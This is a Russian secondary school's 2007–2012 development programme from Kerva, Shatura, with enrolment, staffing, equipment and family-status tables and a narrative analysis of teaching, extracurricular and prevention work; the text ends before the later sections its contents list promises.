Согласовано»                 «Согласовано»                    «Утверждено» пед.советом

Начальник                        Председатель                       Директор

Управления                  управляющего совета              МОУ СОШ мкр. Керва

Образования                 МОУ СОШ мкр.Керва                                                     

________                              __________                            _____________

Веселова Н.Н.                   Корнюшко Е.В.                        Завьялова Г.Е.

«___»________              прот. №___от  __________       пр.№ __ от __________

 

 

 

 

Программа

развития

МОУ СОШ мкр. Керва

г. Шатуры

Шатурского муниципального района

Московской области

на период

2007 -2012 г.г.

 

Содержание программы

 

1. Информационная справка о школе

  1. Из истории школы
  2. Численность уч-ся
  3. Количество классов по ступеням и наполняемость этих классов
  4. Наши учителя
  5. Состояние материально-технической базы
  6. Режим работы школы
  7. Здоровье уч-ся
  8. Характеристика социального статуса семей
  9. Характеристика социума

10. Наши традиции

11. Наши ученики

2. Учебный план

3. Анализ работы

4. Концепция развития школы

  1. Актуальность образовательной и  воспитательной работы в общеобразовательном учреждении на современном этапе развития общества.
  2. Цели и задачи функционирования образовательной и  воспитательной системы МОУ СОШ мкр.Керва.
  3. КОНЦЕПТУАЛЬНЫЕ ОСНОВЫ РАЗВИТИЯ ШКОЛЫ
  4. Этапы освоения и внедрения программы развития школы.
  5. Перспективы и ожидаемые результаты.
  6. Ресурсное обеспечение программы.
  7. Исследование эффективности программы
  8. Модель выпускника.
  9. Мероприятия программы

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

1. ИНФОРМАЦИОННАЯ СПРАВКА О ШКОЛЕ

 

 

1. Из истории школы:

В 1918 году в Шатуре начинается активное освоение залежей торфа, ведется строительство районной электрической станции, первенца плана ГОЭЛРО. В местах торфоразработок возникают поселки. В одном из них, поселке Керва,  была открыта начальная школа в 1928 году. Первой учительницей школы была Ивашкина Антонина Ивановна. В 1936 году начальная школа преобразована в семилетнюю. Директором школы становится учитель математики Патутков Иван Михайлович. Школа размещалась в деревянном здании на берегу озера Святое. Во время Великой Отечественной войны 18 выпускников школы погибли на полях сражений. 4 учителя ушли на фронт, а после окончания войны вернулись на работу в школу. В 1954 году в Керве построено новое здание школы, школа преобразована в среднюю. В 1956 году состоялся первый выпуск уч-ся 10 класса Кервской средней школы. За 50 лет школа выпустила 18 выпускников с золотой медалью, 34 – с серебряной.

 

2. Численность учащихся

 

Период

Кол-во уч-ся

Из них

девочек

мальчиков

Начало 2005 – 2006 уч.г.

149 уч-ся

81

68

Конец 2005 – 2006 уч.г.

147 уч-ся

81

66

Начало 2006 – 2007 уч.г

139 уч-ся

75

64

Конец 2006 – 2007 уч.г

139 уч-ся

75

64

Начало 2007-2008 уч.г.

119 уч-ся

59

60

 Все уч-ся занимаются в 1 смену

 

3. Количество классов по ступеням и наполняемость этих класов

 

Ступень

Количество общеобразовательных классов

2006 – 2007 уч.г.

2007 -2008 уч.г.

Класс

Кол-во классов

Кол-во уч-ся

Класс

Кол-во классов

Кол-во уч-ся

1 ступень

1

1

10

1

1

13

2

1

16

2

1

12

3

1

7

3

1

15

4

1

11

4

1

6

2 ступень

5

1

8

5

1

13

6

1

24

6

1

9

7

1

18

7

1

25

8

1

11

8

1

16

9

1

16

9

1

10

3 ступень

10

1

8

10

---

--

11

1

10

11

---

--

 

4. Наши учителя:

Педагогический коллектив МОУ СОШ мкр.Керва г.Шатуры состоит из 15 человек.

Ø      Имеют квалификационные категории:

Ø      Имеют образование:

Ø      Характеристика учителей по возрасту

 

Всего

Женщин

Мужчин

Средний возраст

Совместители

20– 30 лет

30-40 лет

40-50 лет

50-60 лет

2006 – 2007 уч.г.

16 чел.

15 чел.

1 чел.

3 чел.

3 чел.

5 чел.

5 чел.

1 чел.

2007 – 2008 уч.г.

15 чел

14 чел.

1 чел.

3 чел.

3 чел.

3 чел.

6 чел.

1 чел.

 

Ø      Характеристика учителей по стажу работы:

 

Стаж работы

До 3-х лет

3-5 лет

5-10 лет

10-15 лет

15-20 лет

20 лет и более

2006 – 2007 уч.г.

1 чел.

1 чел.

3 чел.

2 чел.

1 чел.

8 чел.

2007 – 2008 уч.г.

---

1 чел.

3 чел.

3 чел.

----

8 чел.

 

5. Состояние материально-техническое базы

 

Залы, кабинеты, мебель, оборудование, техника

Количество

Оптимальное состояние

Допустимое состояние

Критическое сосотояние

1

Спортивный зал

------

 

 

 

2

Спортивная площадка

1

 

+

 

3

Актовый зал

---

 

 

 

4

Мастерские

2

 

+

 

5

Хоз. блок

1

 

+

 

6

Учебно-опытный участок

1

 

+

 

7

Фруктовый сад

1

 

+

 

8

Кабинеты:

  • Нач. классов
  • ИЗО
  • Русского языка
  • Английского языка
  • Обслуживающего труда
  • Химии
  • Музыки
  • Географии
  • Математики
  • Истории
  • Физики
  • Информатики

 

4

1

1

1

 

 

1

1

1

1

1

1

1

1

 

 

 

 

 

 

 

 

+

 

 

 

 

 

+

 

+
+
+
+

+



+

+


+

 

 

 

 

 

 

 

 

 

+

 

+

9

Столовая

1

 

+

 

10

Мебель

Имеется

 

+

 

11

Телевизор

6

+

 

 

12

DVD - плеер

2

+

 

 

13

Видеопроектор

1

+

 

 

14

Видеоплеер

2

 

+

 

15

Музыкальный центр

1

 

+

 

16

Магитофон

5

 

+

 

17

Синтезатор

1

 

+

 

18

Радиоузел

1

+

 

 

19

Графопроектор

4

 

+

 

20

Диапроектор

9

 

+

 

21

Кинопроектор

4

 

 

+

22

Электрофон

10

 

+

 

23

Ксерокс

1

+

 

 

24

Кодоскоп

5

 

+

 

25

Принтеры

3

+

 

 

26

Сканер

1

+

 

 

27

Многофункциональное устройство

1

+

 

 

28

Компьютеры

10

+

+

 

 

6. Режим работы школы

На 1 ступени образования – пятидневная рабочая неделя, на 2 ступени -  шестидневная рабочая неделя. Продолжительность уроков – 45 минут, перемен – 10 минут. На 1 ступени образования после 2-го урока – большая перемена продолжительностью 40 минут. На 2-ой ступени образования после 3-го урока – большая перемена продолжительностью 30 минут.

 

7. Здоровье уч-ся

 

 

Группа здоровья

Основная

Подготовительная

Специальная

2006 – 2007 уч.г.

113

24

2 чел.

2007 – 2008 уч.г.

97

20

2 чел.

 

8. Характеристика социального статуса семей уч-ся

 

Дата занесения данных

Январь 2007 г.

Сентябрь 2007 г.

Кол-во

%

Кол-во

%

Всего семей

110

100

104

100%

Полная семья

75

70

59

58%

Неполная семья

35 семей

39 чел.

30

41

42%

Проживают с мамой

33 семьи

37 чел.

30,8

40

38%

Проживают с папой

1

0,8

1

1%

Семья-опекун

4

3,2

4

4 %

Многодетная семья

4

3,2

6

 

5,5%

Неблагополучная семья

5

 

4

4

4%

Малообеспеченная семья

11

 

9

5

5%

Семья, воспитывающая ребенка-инвалида

---

---

---

---

Семьи, имеющие статус «чернобыльцев»

---

---

---

---

Семьи, где родители оба безработные\ детей в них

---

---

---

---

Семьи, где один родитель безработный\ детей в них

9\9

9%

9\9

9%

Семьи, где оба родителя инвалиды\детей в них

---

---

---

---

Семьи, где один родитель инвалид\детей в них

2\2

 

1,5%

2\2

2%

Семьи, стоящие в КДН

3

2%

3

3%

Семьи, стоящие на ВШУ

5

5%

5

5%

Дети-сироты

1

 

0,8

1

 

1%

 

9. Характеристика социума

 

Население микрорайона

Окружение школы

  1. Рабочие – 86%
  2. Служащие – 14%

Дом культуры мкр.Керва

Поликлиника мкр.Керва

МДОУ №5

МУ ЦСО мкр.Керва

Стадион мкр.Керва

 

10. Наши традиции:

Ø      День Знаний. Посвящение в первоклассники.

Ø      День Учителя. День самоуправления.

Ø      Туристические слеты.

Ø      Ярмарка «Природа и фантазия».

Ø      Новогодний калейдоскоп.

Ø      Спортивный праздник «Морозко»

Ø      Военно-спортивная игра «Зарница»

Ø      Месячник «Сыны Отечества»

Ø      Неделя Детской книги

Ø      Дни Здоровья

Ø      Дни Труда

Ø      Акция «Сохраним родную Землю»

Ø      Вахта Памяти.

11. Наши ученики:

В школе обучается 121 уч-ся. Ученики школы – дипломанты международных конкурсов детского рисунка, победители областных конкурсов творческих работ, районных конкурсов чтецов, рисунков, выставок детского творчества, призеры районной спартакиады школьников, призеры районных олимпиад по биологии, физической культуре, трудовому обучению, победители районных ученических конференций по истории и краеведению. Выпускница 9 класса 2007 г. Новикова Мария – стипендиат Губернатора Московской области, победитель международных, Всероссийских, областных соревнований по гребле на байдарке. В настоящее время обучается в Школе олимпийского резерва в г.Бронницы.

 

 

3. Анализ работы

 

Педколлектив школы работает над выполнением задач:

1. Направить деятельность педколлектива на реализацию приоритетного национального проекта «Образование».

2. Продолжить работу над методической темой «Создание личностно-ориентированных ситуаций в процессе обучения и воспитания».

3. Совершенствовать работу по художественно-эстетическому направлению.

4. Активизировать работу по гражданско-патриотическому воспитанию.

5. Обеспечить антитеррористическую защищенность ОУ.

 

Характерной чертой жизни педколлектива является стабильность. Это прежде всего отражается на численности учителей и уч-ся школы. Однако школа испытывает трудности в необеспеченности педкадрами по трудовому обучению.

Кол-во уч-ся в школе на начало учебного года – 139 чел., на конец учебного года – 139 чел.

Выпускники школы:

·        9 класс – 16 чел.

·        11 класс – 9 чел.

·        Экстерн – 1 чел.

По итогам государственной (итоговой) аттестации в традиционной форме и в форме ЕГЭ выпускники школы были награждены:

·        выпускница 11 класса Белова Елена Алексеевна – серебряной медалью,

·        выпускники 11 класса Казьмина Мария, Марайкова Елена - похвальными грамотами «За особые успехи в изучении отдельных предметов»

·        выпускники 9 класса Новикова Мария, Некрасов Кирилл, Уляпин Иван - похвальными грамотами «За особые успехи в изучении отдельных предметов»

Все выпускники 9, 11 кл. и экстерн успешно сдали государственную (итоговую) аттестацию и получили документ об образовании.

Распределение выпускников:

11 кл.: ВУЗ –  6 чел., ССУЗ – 3  чел.

9 кл.: ССУЗ – 1 чел., ПУ –  2 чел.

В школе 11 классов, все занимаются в 1 смену. Все уч-ся школы были охвачены обучением в очной форме,  для 1 уч-ся в целях получения среднего (полного) общего образования была организована промежуточная аттестация в форме экстерната.

 Отсева уч-ся без уважительной причины нет.

 

Педколлектив ОУ принял активное участие в районных конкурсах «Педагог года», «Марафон классных руководителей». Синодова Ю.Б. – дипломант конкурса «Педагог года», Полухова Е.А. - дипломант конкурса «Марафон классных руководителей».

На базе ОУ в течение учебного года были проведены районные мероприятия:

Образовательный процесс строился по учебному плану на основе базисного учебного плана 1998 г.

Главным итогом  учебного года следует считать:

- полное выполнение учебного плана школы;

- соблюдение санитарно-гигиенических норм по учебной нагрузке на каждого ученика;

- выполнение образовательных программ по всем предметам в полном объеме как в теоретической, так и в практической части.

В школе в течение учебного года велись все предметы согласно учебного плана.

Продолжалось обучение по предметам школьного компонента:

Регионального компонента:

·        Право – в 9-11 кл.

·        Русский язык – 10 – 11 кл.

·        ОБЖ – 5 – 11 кл.

 

Программы по предметам полностью выполнены.

 

В течение уч. года, выполняя поставленные задачи, проводятся педагогические советы, совещания, заседания ШМО, где рассматривались вопросы образовательного процесса, дополнительного образования и внеурочной деятельности. Совместно с педколлективом обсуждаются инновации, эксперименты, основные мероприятия в рамках ПНП «Образование».

 

В течение уч. года особое внимание уделялось работе пед. Коллектива по теме: «Создание личностно-ориентированных ситуаций в процессе обучения и воспитания».

В связи с этим были поставлены конкретные задачи перед педагогами использовать возможность создания ситуаций индивидуального и коллективного выбора для уч-ся в образовательном процессе, создать условия, в результате которых происходит максимальное влияние образовательного процесса на развитие индивидуальности ученика.

 

Результат педагогического мастерства – качество знаний, умений, навыков уч-ся. От методики преподавания, дифференцированного подхода к уч-ся в процессе обучения, развития самостоятельной активности, мышления, памяти, речи зависит уровень знаний, умений, навыков уч-ся.

 

В течение уч. года администрация школы проводила инспекционный контроль по личностно-ориентированному направлению.

Анализ посещенных уроков показал, что учителя уделяют внимание методике по личностно-ориентированному направлению, созданию личностно-ориентированные ситуации в процессе преподавания, индивидуального подхода к уч-ся. Задача обучения состоит в обеспечении зоны для индивидуального творческого развития каждого ученика. Ученик выстраивает свой образовательный путь, опираясь на индивидуальные качества и способности. К данной модели образования стремится каждый учитель ОУ, развивая личностный потенциал каждого ученика. Индивидуальные подход в процессе преподавания приводит к реализации личностного потенциала каждого уч-ся через осуществление соответствующих видов деятельности:

 

 

Работая над выполнением данных направлений, учителя на уроках применяют индивидуальные задания, организацию парной и групповой работы, работу над выполнением проблемных заданий, метод диалога, создают ситуации выбора и успеха.

Работа по данному направлению особо прослеживается на уроках учителей:

 

·        И.П.Мельникова на уроках биологии и химии: педагогическая цель урока – ввести уч-ся в научно-исследовательскую деятельность, развивать умения и навыки самостоятельной исследовательской работы, развивать такие качества личности, как целеустремленность, ответственность, настойчивость в достижении конкретного результата. Уч-ся в течение урока осваивают методику опыта и разрабатывают схемы и систему наблюдений, умеют делать выводы и доказывать свою точку зрения.

 

·        Г.А. Рябова на уроках математики и информатики стимулирует уч-ся к выбору различных способов решения задач. Особое внимание уделяет анализу ответа уч-ся не только с позиции правильности, но и с учетом того, как ученик рассуждал, отвечая на поставленные учителем вопросы.

 

 

·        Р.М. Салахова, Е.В. Корнюшко на уроках русского языка и литературы используют разнообразные формы и методы организации работы с уч-ся, создают атмосферу заинтересованности каждого уч-ся, стимулируют уч-ся к использованию разнообразных способов выполнения заданий, развивают самостоятельность суждения, взглядов на проблемы, поставленные автором в произведении.

 

·        Филатова  Н.В. на уроках физики и астрономии применяет способы индивидуальной самореализации уч-ся через создание проблемы, обработку путей ее решения с помощью ученических версий устных и письменных ответов, обсуждения в мини-группах заданной проблемы.

 

 

·        Вельмисская Е.П., учитель иностранного языка,  на уроках применяет разнообразные формы и методы, особое внимание уделяет на развитие устной и письменной речи через творческие индивидуальные задания, уделяет внимание анализу ответа ученика с учетом рассуждения. Учитель активизирует познавательную деятельность через индивидуальные и групповые занятия.

 

·        Таразанова Е.Н. на уроках географии применяет коллективное обсуждение проблемной ситуации, сравнение предложенных вариантов, составление плана творческой работы. Уч-ся, обсуждая ситуации, приходят к определенным выводам, предложениям. Учитель уделяет внимание формированию умения самостоятельно работать с научной литературой, справочниками, вести записи наблюдений, овладевать методикой статистической обработки результатов исследования.

 

 

·        Личностно-ориентированное направление особенно прослеживается на уроках начальной школы. Учителя Артамонова Н.В., Синодова Ю.Б., Полухова Е.А., Астахова Н.И. через разнообразные формы и методы преподавания, через игровые ситуации формируют навыки и умения уч-ся, развивают познавательный интерес к предметам, самостоятельную активность, творческие способности. Особое внимание – на индивидуальный подход к каждому ученику.

 

·        Артамонова Н.В., учитель нач. классов. В процессе преподавания уделяет особое внимание индивидуальной работе с уч-ся, развивает логическое мышление, память, устную речь, применяя наглядный дидактический материал, связывает учебный материал с жизнью и интересами детей, стремится обогатить их представления об окружающем мире, обществе, природе.

 

 

·        Астахова Н.И., учитель нач. классов, выполняет требования к современному уроку, творчески подходит к каждому их них, применяет разнообразные формы и методы преподавания, уделяет особое внимание развитию речи, самостоятельной активности, уч-ся выполняют оригинальные задания, сочиняют загадки, считалки, сказки, изготавливают изделия по тематике «Природа и фантазия», «Космос. Вселенная.» и др. В ходе выполнения творческого задания обеспечивается динамика дальнейшей образовательной деятельности.

 

Однако не все учителя уделяют должное внимание личностно-ориентированному направлению в процессе преподавания.

 

Так уроки учителя ОБЖ Рогачевой Н.Н. однообразны, применяются одни и те же методы преподавания, нет личностного, индивидуального подхода к уч-ся.

 

Учителя должны видеть возможности каждого ребенка, стимулировать и поддерживать стремление уч-ся проявлять и развивать свои способности, обеспечивать успешное усвоение программного материала. Учитель должен сформировать учебную деятельность уч-ся и индивидуальный стиль познания, способствовать проявлению самостоятельности, инициативы, творчества. Личностно-ориентированное направление в процессе обучения – целенаправленная организованная деятельность учителя, в результате которой уч-ся овладевают знаниями, умениями, навыками, развивают свои личностные творческие качества, обеспечивающие реализацию жизненного потенциала и назначения.

Однако качество знаний и уровень воспитанности уч-ся – одна из проблем школы.

 

Администрация школы и педколлектив обращает особое внимание на :

Ø      Выполнение учебного плана в процессе обучения;

Ø      Действенность и актуальность плана работы школы;

Ø      Оптимальные выбор инспекционно-контрольной деятельности;

Ø      Диагностику уровня профессионализма учителя;

Ø      Выбор инновационных педагогических технологий, влияющих на повышение уровня обученности и воспитанности уч-ся.

 

В связи с этим необходимо обратить внимание на создание интегрированных образовательных услуг, углубленное изучение литературы, истории Отечества, иностранного языка, экологии, обеспечивающих высокий образовательный и общекультурный уровень уч-ся.

 

 

 

Работая над реализацией приоритетного национального проекта «Образование», учителя ОУ знакомились с инновационными педагогическими технологиями, посещая районные семинары, совещания с целью изучения и внедрения опыта работы учителей-грандополучателей Шатурского района, принимали активное участие в районных конкурсах «Педагог года»,  «Марафон классных руководителей». Синодова Ю.Б. – дипломант конкурса «Педагог года», Полухова Е.А. - дипломант конкурса «Марафон классных руководителей».

 

Основные направления методической работы:

1.Информационно-диагностическая деятельность.

2.Система повышения квалификации педагогических работников.

3.Организация работы по формированию, изучению, общению и распространению опыта.

4.Работа над методической темой школы « Создание личностно-ориентированных ситуаций в процессе обучения и воспитания».

5.Работа с молодыми специалистами.

Работа над единой методической темой школы – средство повышения профессионального мастерства педколлектива в реализации личностно-ориентированного обучения и воспитания школьников.

От степени научности зависит эффект реализации программы. В связи с этим в учреждении необходимо организовать работу Экспертного совета школы, который будет отслеживать и анализировать результаты внедрения педагогических технологий.

Информационно-диагностическая деятельность.

1.В течение года проводилось на заседаниях ШМО., педсоветах, совещаниях при директоре информирование педагогических работников о новых направлениях в развитии образования, ПНПО, содержании образовательных программ, новых учебниках, локальных актах, нормативных документах.

Повышение теоретического уровня производилось с помощью работы и реализации тем самообразования.

Состояние ЗУНов уч-ся контролировалось мониторингом учебных достижений уч-ся.

 

Обобщается и распространяется опыт работы педагогов школы Астаховой Н.И. по теме «Игра как метод активизации познавательной деятельности».

В школе проходит обобщение и распространение опыта работы учителя физики Филатовой Н.В. Учитель имеет высшую квалификационную категорию, является членом районной аттестационной комиссии, принимает активное участие в работе ШМО, РМО, открытые уроки для коллег школы и района. Учителем разработана адаптированная программа факультативных занятий « Наглядная геометрия».

 

 

Работа над методической темой школы « Создание личностно-ориентированных ситуаций в процессе обучения и воспитания»

 

Формы и направления метод работы над темой

Реализация

Педагогические чтения

« Создание личностно-ориентированных ситуаций в обучении и воспитании»

 

 

Методические объединения учителей

МО учителей начальных классов

( руководитель Астахова Н.И.)

МО учителей естественно – математического цикла

( руководитель Рябова Г, А.)

МО учителей гуманитарного цикла

(Руководитель Салахова Р.М.)

Школьные и предметные олимпиады

Проведение школьных туров олимпиад и участие в районных олимпиадах по русскому языку, литературе, математике, химии, физике, физкультуре, биологии, физкультуре, праву, иностранному языку, истории, географии, астрономии. Уч-ся школы в 2006-2007 уч. г., принимая участие в районных олимпиадах, достигли следующих результатов:

Биология: 3 место (9 класс); Отмечены 2 уч-ся

Физкультура: 3 место, отмечены 2 уч-ся

Математика: отмечен 1 уч-ся

Самообразование педагогов

Темы самообразования выбраны по методам личностно-ориентированного направления в процессе обучения и воспитания в начале года, работа  над темой осуществляется в течение года

Творческие конкурсы

Участие уч-ся в международных конкурсах-играх:

  • « Кенгуру»-27 уч-ся, 2 место в районе у уч-ся Кондратьева К.(7 кл.)
  • « Русский медвежонок»-27 уч-ся

Участие в творческих конкурсах, исследовательская работа

  • Творческие литер. конкурсы: Ситаев Д.(9 кл.)  занял 2 место в областном творческом конкурсе.
  • Исследовательские работы: 2 уч-ся: Казьмина М. (11 кл.), Белова Е. (11 кл.) – призовые места в районе, работы отмечены в области.
  • Конкурсы по ИЗО-6 уч-ся стали дипломантами Всероссийского конкурса «Эра фантастики»
  • « Юный эрудит»- Белова И. (4 кл.) – 3 место в районном туре.

 

Теоретические семинары

Проведение районного семинара для зам. директоров по УВР на базе школы по теме« Методическая работа в современной школе»; для учителей ИЗО «Межпредметные связи на уроках Изо»; школьный семинар по теме «Реализация темы самообразования учителя в методической теме школы»

Круглые столы

Круглый стол« Преемственность в обучении и воспитании»

Открытые уроки

1. Учитель начальных классов Артамонова Н.В.  « Величины и их преобразования. Решение задач» (4 класс)

2. Учитель начальных классов Полухова Е.А. « Русская матрешка « (3 класс)

3. Учитель математики Рябова Г.А. « Линейная функция и ее график « (7 класс)

4. Учитель физики Филатова Н.В. « Закон Всемирного тяготения. Искусственные спутники Земли» (9 класс)

5. Учитель биологии Мельников И.П. « Методы селекции растений»

6. Урок ИЗО по линии РМО (Полухова Е.А.)

7. Урок англ. Яз. по линии РМО (Вельмисская Е.П.)

8. Библиотечный урок (Астахова Н.И.)

 

 внеклассные мероприятия:

1.Руководитель ШМО учителей начальных классов Астахова Н.И.- заседание ШМО

2.Учитель русского языка и литературы - внеклассное мероприятие «Живая Древняя Русь»

3.Учитель математики Филатова Н.В.- занятие факультатива в 5 классе «Занимательная геометрия»(« Треугольники»)

4.Учитель англ. Языка Вельмисская Е.П.-занятия в кружке в 3 классе « Письмо другу»

Работа временных творческих групп

Создание творческой группы по подготовке к районному семинару.

Творческая группа поддержки учителя в конкурсе « Педагог года 2006», « Марафон классных руководителей».

Консультации по организации и проведению современного урока

Педагогические чтения  «Анализ личностно-ориентированного урока»

Пополнение портфолио каждого учителя.

Обобщение и распространение опыта учителя физики Филатовой Н.В.

Мониторинг педагогической успешности

Предметные недели

Неделя словесности

Экологическая неделя

Физико-математическая

Историко-патриотическая

Неделя детского творчества

Книжкина неделя

Спортивно-оздоровительная

 

Педколлектив, решая воспитательные задачи, прежде всего формирует ценностный потенциал личности:

Ø      Чувство любви к Отечеству и интернационализм;

Ø      Осознанность активного гражданина;

Ø      Чувство дружбы, сотрудничества, товарищества;

Ø      Аккуратность, исполнительность, чувство долга и ответственности;

Ø      Терпимость к идеологии другого человека;

Ø      Активность в общественных делах.

Большое внимание уделяется развитию творческих способностей уч-ся. Приоритетным направлением воспитательной работы является художественно-эстетическое.

В школе обучается 40% уч-ся, имеющих повышенную мотивацию учебной деятельности. Именно эти уч-ся – активные участники школьных и районных олимпиад по предметам, конференций, творческих конкурсов.

В течение уч. года уч-ся имеют определенные результаты:

 

Развитию творческих способностей уч-ся способствуют факультативные, кружковые занятия. В школе были организованы 12 кружков, 4 факультатива по различным направлениям интересов уч-ся. Охват уч-ся составил 95%.

Особое внимание в школе уделяется художественно-эстетическому направлению. В течение уч. года была организована работа следующих кружков: МХК (рук-ль Завьялова Г.Е.), «Хоровое пение»(рук-ль Салахова Р.М.), «ИЗО» (рук-ль Полухова Е.А.), «Прикладное искусство» (Таразанова Е.Н.), Умелые руки» (рук-ль Артамонова Н.В.), «Русский народный фольклор» (рук-ль Синодова Ю.Б.), «Школьный театр» (рук-ль Корнюшко Е.В.), «Русские народные традиции» (рук-ль Астахова Н.И.). Смотр кружков показал, что уч-ся с большим интересом посещают занятия, где реализуют творческие способности, принимая участие в конкурсах чтецов, рисунков, праздниках, выставках прикладного искусства.
Однако необходимо уделить внимание развитию танцевальных способностей уч-ся. В связи с этим необходимо открыть творческое объединение «Хореография».

В школе в течение учебного года проводились предметные недели, развивающие познавательный интерес к предмету. Особенно интересно были организованы неделя словесности, посвященная году славянской письменности и культуры, и  спортивно-оздоровительная неделя. Однако учителям необходимо обратить внимание на совершенствование форм проведения предметных недель, разнообразие форм проведения мероприятий, на активизацию органов самоуправления уч-ся в подготовке мероприятий.

 

Развивая познавательный интерес к предметам, учителя школы организовали в течение учебного года посещение выставок, музеев, театров Москвы и Подмосковья, городов Владимира, Тулы, Коломны, Ликино-Дулево, организовали экскурсии на предприятия района: ООО «Технолазер», оранжерея г.Шатуры, мастерская по росписи деревянных игрушек, ОАО «МК «Шатура»).

 

В школе уделяется внимание пропаганде здорового образа жизни. Разработана комплексная целевая программа «Здоровье», проводятся Дни Здоровья, спортивные соревнования, туристические слеты, выпуск газет по профилактической направленности, с целью профилактики зависимостей проводились встречи с сотрудниками Шатурской ЦРБ. Ежегодно уч-ся школы проходят диспансеризацию. Проведена 100% -ая вакцинация уч-ся против гриппа. Однако анализ заболеваемости показал, что у уч-ся школы наблюдается рост хронических заболеваний: ЖКТ, ССС, зрение, кариес. В связи с этим необходимо усилить работу по профилактике заболеваемости, пропаганде здорового образа жизни.

Одной из проблем школы является отсутствие спортивного зала, что влияет на качество проведения учебных занятий по физической культуре и внеклассной спортивной работы.

Здоровье детей зависит от правильного питания.  В школе ведется интегрированный курс по  программе «Разговор о правильном питании», которая реализуется во время уроков и внеурочной деятельности не только с уч-ся, но и с родителями. В рамках реализации данной программы были проведены конкурсы фотографий «Самый вкусный завтрак», рисунков «Полезные продукты» и др. мероприятия.

В школе организовано горячее питание в школьной столовой. Охват уч-ся составил 95%, в основном это уч-ся 1 – 9 кл. Поэтому необходимо обратить внимание на пропаганду необходимости горячего питания среди уч-ся 10 – 11 кл.

 

 

Особое внимание уделяется мониторингу качества работы классных руководителей.

В целях реализации национального проекта «Образования» в МОУ СОШ мкр. Керва были разработаны и приняты критерии оценки деятельности классного руководителя. Исходя из некоторых положений этих критериев в школе были проведены исследования уровня воспитанности уч-ся 5 – 8 кл. и их социализации методами наблюдения и диагностики. Особое внимание уделялось воспитанию духовно-нравственных качеств личности уч-ся:

·              интеллектуальные качества (эрудированность, творческая активность, способность к самоанализу и т.д.): По этому показателю выделяются уч-ся 6 и 7 кл. Уч-ся этих классов проявляют высокую творческую активность, они являются призерами и отмеченными жюри на районных турах предметных олимпиад (Батин Н., Тюкова А., Жигунова Т.). Навыки самоанализа у уч-ся 2 ступени обучения развиты не слишком хорошо, но это объясняется особенностями психологии уч-ся этого возраста.

·              нравственные качества (уважительное отношение к старшим и младшим, доброжелательность, отзывчивость, честность, справедливость и т.д.): воспитание этих  качеств, конечно же, должно происходить, главным образом, в семье. Поэтому классным руководителям необходимо обратить внимание родителей на недостаточное воспитание, а иногда и на отсутствие вышеперечисленных качеств у уч-ся.

·              В школе было проведено анкетирование уч-ся по отношению к общечеловеческим ценностям. Итоги анкетирования отражены в общей таблице по классам. Следует отметить, что по важности 1 место в жизни уч-ся 5 – 7 кл. занимает учеба, а у уч-ся 8 кл. общение с друзьями.

·              Также был проведен мониторинг употребления среди уч-ся ПАВ. Итоги мониторинга отражены в общей таблице. Классным рук-лям 7 – 8 кл. необходимо обратить внимание уч-ся и родителей на итоги этого мониторинга.

Классные рук - ли уделяли внимание работе по  социализации уч-ся:

·                    Занятость в кружках, секциях, клубах:

Практически все уч-ся 5 – 8 кл. заняты в кружках дополнительного образования: школьных, спортивной секции и кружках ДК мкр.Керва, а также посещают музыкальную школу и секции во Дверце спорта г.Шатуры.

·                    Профессиональная ориентация:

Этот критерий оценки деятельности классного руководителя осуществляется для Кл. рук-лей 9 – 11 кл. Однако Кл. рук-ль 8 кл. Рябова Г.А. уже в 8 кл. обращает внимание уч-ся на профессиональную ориентацию: проведены тренинги с психологами СРЦ г.Шатуры, тематический классный час «Все работы хороши». В школе были организованы экскурсии на предприятия Шатурского района, конкурс творческих работ «Моя будущая профессия».

В школе организована работа Совета Учреждения( председатель- зам. директора школы по восп. Работе Корнюшко Е.В.). Н а заседаниях Совета Учреждения особое внимание уделялось вопросам Всеобуча, успеваемости уч-ся, посещаемости учебных занятий, а также профилактике зависимостей. К работе Совета Учреждения привлекались сотрудники ОВД, инспектор ОДН. Совместно с советом профилактики проводились рейды в неблагополучные семьи, рейды с целью проверки вечернего времяпровождения уч-ся, рейды в семьи детей «группы риска», в семьи опекаемых детей.  Результатом систематической работы Совета Учреждения стало снижение пропусков уроков уч-ся и повышение успеваемости уч-ся «группы риска». Однако в работе Совета Учреждения необходимо обратить внимание на активизацию роли родителей, на профилактику правонарушений уч-ся.

 

В школе в течение учебного года работал Совет профилактики (председатель – зам. директора школы по воспит. работе Корнюшко Е.В.). Выполняя задачу по профилактике безнадзорности, беспризорности, правонарушений среди уч-ся, а также профилактике зависимостей от ПАВ, были проведены заседания Совета, где рассматривались вопросы выполнения Закона «Об образовании», приглашались уч-ся и их родители, проводилась ежедневная работа с детьми «группы риска». Однако необходимо уделить особое внимание по профилактике зависимостей от ПАВ, т.к. в течение уч. года были выявлены случаи употребления спиртных напитков 5 уч-ся, также необходимо организовать лекторий по профилактике правонарушений и зависимостей от ПАВ.

 

В школе работает социальный педагог, деятельность которого направлена на предупреждение безнадзорности, беспризорности и профилактику правонарушений. Работа социального педагога непосредственно связана с семьями уч-ся, на особом контроле находятся семьи уч-ся «группы риска», семьи опекаемых детей. Необходимо создать базу данных каждой семьи уч-ся школы.

В течение учебного года проводились рейды в неблагополучные семьи, в семьи детей «группы риска» (всего проведено 39 рейдов). Проводились мониторинг среди уч-ся по воспитанию потребности в здоровом образе жизни, исследования с целью выявления социальных и личностных проблем детей всех возрастов, диагностика «Социометрия» в 5 – 6 кл., мониторинг по употреблению ПАВ (2 раза в год), тренинги на психологические темы, устный журнал «Права ребенка», диспут «Я в мире, мир во мне», тренинг «Победи своего дракона» и др. мероприятия.

Особое внимание уделяется работе с родителями. Были проведены мероприятия: индивидуальные консультации на основании результатов диагностик и мониторингов, разработаны рекомендации для классных руководителей по работе с родителями, проведен родительский лекторий с приглашением психолога из СРЦ, педагогический всеобуч по теме «Воспитание нравственности и духовности у детей в семье». В течение учебного года родители приглашались на совместные заседания Совета профилактики и ПМПК, где рассматривались вопросы всеобуча и выполнения Закона «Об образовании». Особое внимание уделялось контролю посещений учебных занятий уч-ся и выявлению причин пропусков. В результате систематической работы по данному направлению 100% уч-ся посещали школу.

С целью повышения успеваемости и качества знаний соц.педагог проводил работу с классными руководителями. Результат: количество неуспевающих сократилось на 3 чел.

 

В школе организована работа библиотеки (библиотекарь Астахова Н.И.).

